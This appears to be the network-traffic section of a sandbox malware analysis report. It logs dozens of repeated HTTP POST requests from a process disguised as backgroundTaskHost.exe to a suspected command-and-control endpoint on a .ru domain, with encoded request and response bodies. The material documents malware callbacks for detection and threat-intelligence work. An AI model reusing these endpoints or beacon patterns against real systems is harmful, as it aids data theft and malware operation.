                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3482&min_rtt=1588&rtt_var=4383&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=87211&cwnd=245&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                          54    192.168.2.4    49965    104.21.38.84    80    6020    C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          Jan 4, 2025 11:08:26.658226013 CET    317    OUT    POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:27.014198065 CET    2520    OUT    [encoded POST body]
                                                                                          Jan 4, 2025 11:08:27.131364107 CET    25    IN    HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:27.388319969 CET    808    IN    HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:27 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2FiL9N1d6pjmatr9QOaPsP4u11WeKAespUHeS8yA9D35Yt1KjroVTxSX4NrtFZtle1RWe9W1Pn%2BszHzePVz%2B12nOqo1W3EehRzKPKsoSaws2Oc10XEuifZNN3g4Su89py%2FsgLRNP"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d694daf4229-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=10570&min_rtt=2492&rtt_var=17091&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=21752&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                          55    192.168.2.4    49971    104.21.38.84    80    6020    C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          Jan 4, 2025 11:08:27.563034058 CET    317    OUT    POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:27.920432091 CET    2520    OUT    [encoded POST body]
                                                                                          Jan 4, 2025 11:08:28.006607056 CET    25    IN    HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:28.276791096 CET    801    IN    HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:28 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WsBuPC1K820XkkUaGgcjgdS3HFuyORC3nxs67vAnPwH4XPXjkuc%2FlxOJ8OPrxrcOYXY1yips9lM6jRSBoNeMZZ1evnV9xgoUfzk0daPU6Db2cEDMjjJwBCxCpmNCsQuayJBwnG1O"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d6ecacc42d5-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3085&min_rtt=2395&rtt_var=2278&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=184413&cwnd=220&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID    Source IP    Source Port    Destination IP    Destination Port    PID    Process
                                                                                          56    192.168.2.4    49977    104.21.38.84    80    6020    C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp    Bytes transferred    Direction    Data
                                                                                          Jan 4, 2025 11:08:28.466058016 CET    317    OUT    POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:28.811028004 CET | 2520 | OUT |
                                                                                          Jan 4, 2025 11:08:28.918373108 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:29.187083006 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:29 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XFEii%2FL8TZSluILZZbHvW%2FsfPQaUyWoQQMEPD2YVP0J5%2FR2gsUGrJrZlHAIPRZ2oQFQMb9PstuYdzPiuXS4DXI%2Fa0nPLjMFC%2B%2F49zKspEE8dwtOkYHaDO3KJ3eqmUXG2MUf0TD%2Bz"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d747ed0425c-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4852&min_rtt=1889&rtt_var=6636&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=57031&cwnd=225&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          57 | 192.168.2.4 | 49978 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:29.442920923 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          58 | 192.168.2.4 | 49984 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:29.738935947 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:30.092278957 CET | 1844 | OUT |
                                                                                          Jan 4, 2025 11:08:30.202022076 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:30.462202072 CET | 957 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jwm6zlPipTsSi4142XNLmcb7YvNKN6tnxTAVe0Z3nmtS7uX3vhb%2FFRoAFbUYzqys618bgZmsJoJlyj0sE%2FjiGzO3m%2B%2BtWWCGeGVCavKznZZuJvA4m3Nt3SxGzbsj%2BHWA4P3gXns9"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d7c7d6342fb-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4659&min_rtt=1724&rtt_var=6517&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=57915&cwnd=211&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          59 | 192.168.2.4 | 49985 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:30.061341047 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:30.420392036 CET | 2520 | OUT |
                                                                                          Jan 4, 2025 11:08:30.504677057 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:30.763855934 CET | 801 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NGETJweslnImUc7wTJYM2LML0SdMgqU15NWA0FcXo%2BJWPMIjJYfWGTVQS5Rk7bYcdxwyopyQbbObAshiVCCfIetaIf3kbzrw3Ij9lkYeFPDXmr7xsCZQiv9qagf46soGrOUSQlNA"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d7e6d9af5fa-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2567&min_rtt=1625&rtt_var=2494&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=159336&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          60 | 192.168.2.4 | 49991 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:30.891230106 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:31.248611927 CET | 2520 | OUT |
                                                                                          Jan 4, 2025 11:08:31.359905958 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:31.631006956 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:31 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=drkwA%2Bn1F4JwULB1OkhEBCSh3VYFqc2g8RLPThNh5Tzk7xoig%2BTv7mYBjp3RrJzzw0D1egiipSNhngOkNRSMvq%2B5sm1TbGhww3DorYzaxDsfSmnugJoorIFTf%2FrQ%2BjbQ60xjtuTj"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d83bb568cdd-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4838&min_rtt=1967&rtt_var=6481&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=58538&cwnd=161&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          61 | 192.168.2.4 | 49997 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:32.045197010 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:32.389277935 CET | 2520 | OUT |
                                                                                          Jan 4, 2025 11:08:32.497493029 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:32.760770082 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:32 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=09uJRjIz%2BrKpV88Lz9yKlY%2BnxutSyVokhIX4ajleZo78%2FJ1IQHxEHOFLQ00TppjPtFvevkjuZqHeRehehVlE4SsOfjv%2FInFAH4nZU2U%2BMD6kbZ%2FLSJ51w%2BAcYMyrNnpfdC4cMql7"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d8ade820f5d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4412&min_rtt=1473&rtt_var=6432&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=58418&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          62 | 192.168.2.4 | 50002 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:32.893528938 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:33.248550892 CET | 2516 | OUT |
                                                                                          Jan 4, 2025 11:08:33.337733984 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:33.508618116 CET | 803 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:33 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jaxgVRiv0fYGvdIOQPfs0qDBYpHPpnYdl20hmptcHdXfQF5GeH3HjXJwbRU8yxZscNPeSubVUlq8u5jct784ShJA%2F9nzPNFn7Tx9tzDPcX06hkevyLX%2BXY2Uk7sswuM3Pf3CL5i6"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d901e43433d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2053&min_rtt=1723&rtt_var=1307&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=334172&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          63 | 192.168.2.4 | 50007 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:33.646380901 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:33.998532057 CET | 2520 | OUT |
                                                                                          Jan 4, 2025 11:08:34.117625952 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:34.293034077 CET | 811 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:34 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XEug750A%2B55SBNJvUGYFj59eYxwdTA3G%2FigVCDVjaJgiZfIG%2BIyNbd%2Bpr%2Bp12w5KFycbasd8p0Y3TwVvxp6rUcL9EtlZSJUPtlY6KP3DOmezVv18LV%2F0uybAnzpApf0kCUcXTqbL"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d94eaea0f68-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=7411&min_rtt=1478&rtt_var=12422&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=29826&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          64 | 192.168.2.4 | 50013 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:34.427416086 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:34.779824972 CET | 2520 | OUT | Data Raw: 54 58 5e 5e 55 5a 5a 5c 5c 5b 52 58 57 52 58 5b 58 56 5a 59 52 52 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TX^^UZZ\\[RXWRX[XVZYRRQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-*97 ;*% #\>Z-!!0>V#>-(<+Y(634>._=!Y#!Y,
                                                                                          Jan 4, 2025 11:08:34.871939898 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:35.144752979 CET | 813 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:35 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r9p9g1759Cs1Spl1%2BrF7FHtAHlVCpqaFGLUiXF9NhMe9rtF0P%2Ba8mBGest%2B3zl7ttOY7k7LgRSh1BJEy8Nh8ml11%2FnLLH3xv2XFgT5Y0EBnO5oZV9dba0QhLoRSj0yZ%2F4MC%2B%2FofE"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6d99ac914241-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8520&min_rtt=1902&rtt_var=13950&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=26618&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          65 | 192.168.2.4 | 50019 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:35.268477917 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          66 | 192.168.2.4 | 50025 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:35.476320982 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:35.826721907 CET | 1844 | OUT | Data Raw: 54 5b 5e 54 55 52 5a 55 5c 5b 52 58 57 58 58 5d 58 54 5a 52 52 50 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[^TURZU\[RXWXX]XTZRRPQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.C)93B#^%P%+Y(<56$=$#-:(]?%47==!Y#!Y,.
                                                                                          Jan 4, 2025 11:08:35.927033901 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:36.215492010 CET | 953 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:36 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dGuIvtT1g0oGyDLiuLvyqlaNBR3L1MkUuMTClxya1rJr6RkAjemb4QZ%2BovOygX0cNRm8JM%2BXQ9XlOkX5szBmTOF5wXA7bdZiFNMSUaGWukst23jm8NAS6lzbx%2B9ANPTS3ut0zNjn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6da04fcb4291-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3420&min_rtt=1731&rtt_var=4029&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=95737&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0f 3f 10 20 51 22 59 28 5c 2a 10 39 00 25 33 27 02 2f 0f 3b 16 37 3c 27 5a 38 32 39 58 26 33 01 04 3d 59 2f 0e 34 09 2f 57 30 20 2a 5d 06 12 3b 02 3f 2c 0c 10 25 05 3d 0f 2a 31 3d 1a 24 0f 22 58 24 13 3f 5b 3f 3c 21 16 25 12 18 0f 2b 3c 36 12 3a 03 3c 0a 2c 3f 30 56 21 13 21 53 08 13 20 57 31 08 27 1e 2a 09 39 10 31 33 25 5a 24 04 0a 0f 3d 2b 23 0b 33 07 3e 17 3a 31 2f 13 28 33 34 58 3a 58 38 5a 3c 3e 2b 1d 33 06 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
